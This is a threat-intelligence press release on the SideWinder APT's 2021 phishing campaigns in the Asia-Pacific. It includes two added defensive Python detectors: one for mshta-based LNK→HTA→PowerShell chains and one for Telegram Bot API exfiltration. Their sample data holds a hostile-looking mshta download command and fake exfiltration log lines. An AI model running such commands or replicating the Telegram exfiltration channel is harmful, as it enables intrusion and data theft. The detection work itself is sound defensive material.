Molted skin: APT SideWinder 2021 campaign that targeted over 60 companies in the Asia-Pacific

Group-IB, a global cybersecurity leader headquartered in Singapore, has documented previously unreported phishing operations carried out by the nation-state cyber threat actor SideWinder between June and November 2021. The attackers attempted to target 61 government, military, law enforcement, and other organizations in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka. Group-IB’s Threat Intelligence team was also able to attribute a 2020 attack on the Maldivian government to the SideWinder APT (advanced persistent threat) group and found evidence confirming SideWinder’s interest in cryptocurrency. Like many other advanced threat actors, SideWinder has started using the Telegram messaging app to receive information from compromised networks. In a new threat report, “Old snake, new skin: Analysis of SideWinder APT activity between June and November 2021”, Group-IB researchers for the first time confirmed the links between the SideWinder, Baby Elephant, and Donot APT groups and described the entire arsenal of the cyberespionage group, including newly discovered tools.

Group-IB’s new report contains YARA rules for hunting the group and a table of the group’s TTPs (Tactics, Techniques, and Procedures) mapped to the MITRE ATT&CK® matrix, giving companies and organizations the information they need to update their security controls to detect SideWinder.

Fast and venomous

SideWinder APT, also known as Rattlesnake, Hardcore Nationalist (HN2), and T-APT4, is one of the oldest nation-state threat actors and is believed to originate from India. The group has been carrying out cyber espionage attacks against government organizations in the Asia-Pacific region since at least 2012. In June 2022, Group-IB discovered the group’s newest custom tool, SideWinder.AntiBot.Script, which was used in previously documented phishing attacks against Pakistani organizations. SideWinder is notable for its ability to conduct hundreds of espionage operations within a short span of time.

During proactive threat-hunting operations, the Group-IB Threat Intelligence team discovered backup archives on infrastructure attributed to APT SideWinder. One of the 2021 archives contained several phishing projects designed to target government agencies in Southeast Asia, among which were fake websites imitating the Central Bank of Myanmar. Based on the date when the related phishing pages were edited, the Group-IB team was able to reconstruct an approximate timeline of SideWinder’s phishing operations between June and November 2021. As the phishing resources were retrieved from a backup archive by the Group-IB team, there is a possibility that SideWinder’s attacks may have started earlier.

Further analysis of SideWinder’s malicious infrastructure allowed the Group-IB team to compile a list of the group’s 61 potential targets, which includes government, military, financial, law enforcement, political, telecommunications, and media organizations in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka. It is not known whether any of these phishing campaigns were successful. Interestingly, Group-IB analysts discovered two phishing projects mimicking crypto companies. SideWinder’s growing interest in cryptocurrency could be linked to the recent attempts to regulate the crypto market in India.

[Figure: Distribution of organizations targeted by SideWinder APT]

Spear phishing has long been the group’s primary initial attack vector. The victim receives a phishing email containing a URL or a malicious attachment. The URL leads to a malicious document, an LNK file, or a malicious payload. The LNK file downloads an HTA file, which in turn downloads the payload. The payload can be a reverse shell, a remote access Trojan (RAT), or an information stealer.
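The LNK → HTA → payload chain described above leaves a recognisable parent/child pattern in endpoint telemetry, because HTA files are executed by mshta.exe. The following script is an added example, not code from the Group-IB report: it walks a set of Sysmon-style process-creation events and flags any mshta.exe process that was given a remote URL or that spawned a second-stage script host. The event field names mirror Sysmon Event ID 1; the process tree, paths and URL in the sample are constructed for this example and are not indicators from the report.

```python
"""Added example (not from the Group-IB report): flag the LNK -> HTA -> payload
chain in process-creation telemetry.

Input is a list of constructed, Sysmon-style process-creation events (one dict
per event). Field names mirror Sysmon Event ID 1 (Image, ParentImage,
CommandLine, ProcessId, ParentProcessId); every value is invented here.
"""
import re
from collections import defaultdict

# HTA files are run by mshta.exe; the LNK-launched stage typically starts it
# with a remote URL or a freshly downloaded .hta file.
HTA_HOST = "mshta.exe"
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Script hosts and loaders a downloaded HTA commonly hands the payload to
# (generic heuristic, not a list taken from the report).
STAGE_TWO = {"powershell.exe", "cmd.exe", "rundll32.exe",
             "wscript.exe", "cscript.exe", "regsvr32.exe"}

SAMPLE_EVENTS = [  # constructed for this example
    {"ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    # user double-clicks the LNK; its target runs mshta against a URL
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c mshta http://cdn.example.invalid/report.hta"},
    {"ProcessId": 300, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta http://cdn.example.invalid/report.hta"},
    {"ProcessId": 400, "ParentProcessId": 300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell -w hidden -File C:\Users\Public\stage.ps1"},
    # benign: mshta on a local file launched by the user, no children
    {"ProcessId": 500, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta "C:\Program Files\Vendor\setup.hta"'},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_hta_chains(events):
    """Return one finding per mshta.exe process that either was given a URL
    or spawned a second-stage script host. Each finding carries the process
    chain from the oldest known ancestor down to the mshta process."""
    by_pid = {e["ProcessId"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ParentProcessId"]].append(e)

    findings = []
    for e in events:
        if basename(e["Image"]) != HTA_HOST:
            continue
        reasons = []
        if URL_RE.search(e["CommandLine"]):
            reasons.append("remote_hta_url")
        stage_two = [c for c in children[e["ProcessId"]]
                     if basename(c["Image"]) in STAGE_TWO]
        if stage_two:
            reasons.append("spawned_script_host")
        if not reasons:
            continue
        # Walk up the tree as far as the telemetry allows.
        chain, cur = [], e
        while cur is not None:
            chain.append(basename(cur["Image"]))
            cur = by_pid.get(cur["ParentProcessId"])
        findings.append({
            "pid": e["ProcessId"],
            "reasons": reasons,
            "chain": list(reversed(chain)),
            "children": [basename(c["Image"]) for c in stage_two],
        })
    return findings


if __name__ == "__main__":
    for finding in find_hta_chains(SAMPLE_EVENTS):
        print(finding)
```

Against the sample, only the mshta process that both received a URL and spawned PowerShell is reported; the locally launched installer HTA is not. In production the same two conditions map naturally onto an EDR or SIEM rule, and the recovered chain (explorer → cmd → mshta → powershell) is what an analyst would pivot on to find the originating LNK and email.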

[Figure: SideWinder initial attack vectors]

Among the newly discovered tools were SideWinder.RAT.b (a remote access Trojan) and SideWinder.StealerPy, a custom information stealer written in Python and designed to exfiltrate information collected from the victim’s computer. The tool can extract a victim’s browsing history from Google Chrome, credentials saved in the browser, the list of folders in the directory, as well as meta information and contents of docx, pdf, and txt files, etc. Interestingly, both malware samples use the Telegram messaging app to receive data from compromised machines, an increasingly common trend among both APT groups and financially motivated cybercriminals over the past year. Advanced attackers have started preferring Telegram over traditional command and control servers due to its convenience. Gathering and monitoring information about the attackers’ infrastructure in Telegram is essential to ensuring the protection of digital assets.
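Because both SideWinder.RAT.b and SideWinder.StealerPy hand data to Telegram rather than to a dedicated C2 server, the network signal to hunt for is a workstation talking to the Telegram Bot API. The script below is an added example and not code from the Group-IB report: it parses web-proxy log lines, keeps only requests to api.telegram.org whose path has the public Bot API shape (/bot<token>/<method>), and ranks clients by the bytes they pushed out through data-carrying methods such as sendDocument. The log format, IP addresses, user agents and bot tokens are all constructed for this example; only the Bot API endpoint shape is taken from Telegram’s public API.

```python
"""Added example (not from the Group-IB report): spot the Telegram Bot API
being used as an exfiltration channel in web-proxy logs.

Every log line, IP, user agent and token below is constructed. The
endpoint shape https://api.telegram.org/bot<token>/<method> is Telegram's
public Bot API; the line format and thresholds are assumptions of this example.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Bot tokens are "<numeric bot id>:<secret>"; the secret is matched loosely so
# a length change on Telegram's side does not silently break the rule.
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{20,})/([A-Za-z]+)")
# Bot API methods that carry data out of the network (non-exhaustive).
OUTBOUND_METHODS = {"sendmessage", "senddocument", "sendphoto",
                    "sendvideo", "sendaudio"}

# Constructed proxy log: ts client method url status bytes_out "user-agent"
SAMPLE_PROXY_LOG = """\
2021-09-14T08:01:12Z 10.20.1.15 GET https://www.example.invalid/news 200 812 "Mozilla/5.0"
2021-09-14T08:02:40Z 10.20.1.15 POST https://api.telegram.org/bot123456789:AAE7fakeTOKENfakeTOKENfakeTOKEN12/sendDocument 200 1843200 "Python-urllib/3.8"
2021-09-14T08:02:41Z 10.20.1.15 POST https://api.telegram.org/bot123456789:AAE7fakeTOKENfakeTOKENfakeTOKEN12/sendMessage 200 2310 "Python-urllib/3.8"
2021-09-14T08:05:03Z 10.20.1.42 GET https://api.telegram.org/bot987654321:BBF8fakeTOKENfakeTOKENfakeTOKEN34/getUpdates 200 96 "python-requests/2.25"
2021-09-14T08:06:19Z 10.20.1.77 POST https://web.telegram.org/api 200 540 "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d+) (\d+) "([^"]*)"$')


def parse_line(line):
    """Parse one constructed-format proxy line; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, status, size, ua = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "bytes": int(size), "ua": ua}


def redact_token(bot_id, secret):
    """Keep enough of the token to correlate findings without storing it."""
    return f"{bot_id}:{secret[:4]}...{secret[-2:]}"


def find_bot_api_exfil(log_text):
    """Group Bot API calls per client and return one finding per client,
    ranked by bytes sent out through data-carrying methods. Polling calls
    such as getUpdates are counted but contribute no outbound bytes."""
    per_client = defaultdict(lambda: {"bytes_out": 0, "calls": [],
                                      "tokens": set(), "agents": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["url"])
        if parts.hostname != "api.telegram.org":
            continue
        m = BOT_PATH_RE.match(parts.path)
        if not m:
            continue
        bot_id, secret, api_method = m.groups()
        entry = per_client[rec["client"]]
        entry["calls"].append(api_method.lower())
        entry["tokens"].add(redact_token(bot_id, secret))
        entry["agents"].add(rec["ua"])
        if api_method.lower() in OUTBOUND_METHODS:
            entry["bytes_out"] += rec["bytes"]

    findings = []
    for client, entry in per_client.items():
        findings.append({
            "client": client,
            "bytes_out": entry["bytes_out"],
            "outbound_calls": sum(1 for c in entry["calls"]
                                  if c in OUTBOUND_METHODS),
            "tokens": sorted(entry["tokens"]),
            "agents": sorted(entry["agents"]),
        })
    findings.sort(key=lambda f: f["bytes_out"], reverse=True)
    return findings


if __name__ == "__main__":
    for finding in find_bot_api_exfil(SAMPLE_PROXY_LOG):
        print(finding)
```

On most corporate networks no workstation has a legitimate reason to call the Bot API at all, so even the second client, which only polls getUpdates, deserves a look; the ranking simply puts the host that uploaded a large document with a scripting-language user agent at the top. The token is redacted before it reaches an alert so that the finding can be correlated across sightings without copying a live credential into the SIEM.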

Based on the group’s malware samples and network IOCs extracted from them during the analysis, Group-IB researchers built a diagram of SideWinder’s network infrastructure for the first time. The description of the group’s entire arsenal can also be found in the report “Old snake, new skin: Analysis of SideWinder APT activity between June and November 2021”.


Melting pot

Thanks to Group-IB’s patented Graph Network Analysis tool, Group-IB researchers were able to identify a large network infrastructure used by SideWinder. The overlaps between command-and-control servers, as well as between the tools, led the Group-IB team to conclude that Baby Elephant and SideWinder are most likely the same or closely related APTs.

“It is not uncommon for APT groups to borrow tools from each other, which often leads to mistakes in attribution. As such, we discovered that some indicators of compromise related to another APT group, Donot, were wrongly attributed to SideWinder. Nonetheless, we found additional evidence confirming that Patchwork (Hangover), Donot, and SideWinder sometimes borrow tools and malicious documents from each other and adjust them for their needs.”

Dmitry Kupin

Senior malware analyst at Group-IB

The report “Old snake, new skin: Analysis of SideWinder APT activity between June and November 2021” is primarily intended for cybersecurity experts such as malware analysts, SOC, MDR, threat intelligence and threat hunting specialists, incident response teams, and cybersecurity system administrators at private and government organizations. The new report is available for download here.

About Group-IB

Founded in 2003 and headquartered in Singapore, Group-IB is a leading creator of cybersecurity technologies to investigate, prevent, and fight digital crime. Combating cybercrime is in the company’s DNA, shaping its technological capabilities to defend businesses, citizens, and support law enforcement operations.

Group-IB’s Digital Crime Resistance Centers (DCRCs) are located in the Middle East, Europe, Central Asia, and Asia-Pacific to help critically analyze and promptly mitigate regional and country-specific threats. These mission-critical units help Group-IB strengthen its contribution to global cybercrime prevention and continually expand its threat-hunting capabilities.

Group-IB’s decentralized and autonomous operational structure helps it offer tailored, comprehensive support services with a high level of expertise. We map and mitigate adversaries’ tactics in each region, delivering customized cybersecurity solutions tailored to risk profiles and requirements of various industries, including retail, healthcare, gambling, financial services, manufacturing, crypto, and more.

The company’s global security leaders work in synergy with some of the industry’s most advanced technologies to offer detection and response capabilities that eliminate cyber disruptions agilely.

Group-IB’s Unified Risk Platform (URP) underpins its conviction to build a secure and trusted cyber environment by utilizing intelligence-driven technology and agile expertise that completely detects and defends against all nuances of digital crime. The platform proactively protects organizations’ critical infrastructure from sophisticated attacks while continuously analyzing potentially dangerous behavior all over their network.

The comprehensive suite includes the world’s most trusted Threat Intelligence, the most complete Fraud Protection, AI-powered Digital Risk Protection, multi-layered protection with Managed Extended Detection and Response (XDR), all-infrastructure Business Email Protection, and External Attack Surface Management.

Furthermore, Group-IB’s full-cycle incident response and investigation capabilities have consistently elevated industry standards. This includes the 77,000+ hours of cybersecurity incident response completed by our sector-leading DFIR Laboratory, more than 1,400 successful investigations completed by the High-Tech Crime Investigations Department, and round-the-clock efforts of CERT-GIB.

Time and again, its solutions and services have been revered by leading advisory and analyst agencies such as Aite Novarica, Gartner®, Forrester, Frost & Sullivan, KuppingerCole Analysts AG, and more.

Being an active partner in global investigations, Group-IB collaborates with international law enforcement organizations such as INTERPOL, EUROPOL and AFRIPOL to create a safer cyberspace. Group-IB is also a member of the Europol European Cybercrime Centre’s (EC3) Advisory Group on Internet Security, which was created to foster closer cooperation between Europol and its leading non-law enforcement partners.